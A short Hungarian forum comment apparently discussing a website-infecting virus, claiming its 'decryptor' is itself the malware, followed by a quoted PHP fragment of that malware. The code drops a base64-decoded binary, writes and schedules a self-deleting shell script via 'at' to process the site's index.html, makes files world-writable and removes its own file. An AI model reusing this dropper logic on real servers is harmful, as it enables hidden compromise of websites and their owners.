Szerintem valószínűleg sebezhető weblapokon keresztül, legalábbis a "visszafejtő" programjukból (ami egyébként maga a vírus :D) úgy tűnik.
print "Bin dumped ".file_put_contents("./host", base64_decode($so))."\n";
$index_html = $_SERVER['DOCUMENT_ROOT'].'/index.html';
$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$SCP=getcwd();
$SCR ="#!/bin/sh\ncd '".$SCP."'\n./host decrypt key.pem '".$index_html."'\n";
$SCR .="\nrm 1.sh\nexit 0\n";
@file_put_contents("1.sh", $SCR);
@chmod("1.sh", 0777);
@chmod("host", 0777);
$exebin = executebin("at now -f 1.sh");
echo "exec=".$exebin."\n";
for ($i = 0; $i < 5; $i++) {
if (! @file_exists("1.sh")) {
print "run=AT\n";
if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
die('remove=ok\n');
else
die ('remove=false\n');
}
sleep(1);
}